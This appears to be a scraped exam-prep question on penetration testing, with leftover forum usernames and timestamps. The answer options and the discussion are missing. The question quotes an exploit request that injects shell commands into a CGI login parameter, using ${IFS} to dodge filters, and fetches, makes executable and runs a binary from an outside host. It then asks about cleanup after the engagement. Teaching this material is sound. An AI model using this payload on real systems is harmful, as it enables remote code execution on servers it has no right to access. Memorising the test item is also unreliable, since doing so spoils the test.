A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = `POST ` exploit += `/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} `" c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%
27&loginUser=a&Pwd=a`
exploit += `HTTP/1.1`
Which of the following commands should the penetration tester run post-engagement?
BinarySoldier
Highly Voted 3 years, 5 months agobieecop
Most Recent 1 year, 10 months agokenechi
2 years, 2 months agoTheITStudent
2 years, 9 months agorootlikegroot
2 years, 10 months agoisaphiltrick
1 year, 8 months agoDohJayVeh
3 years, 7 months ago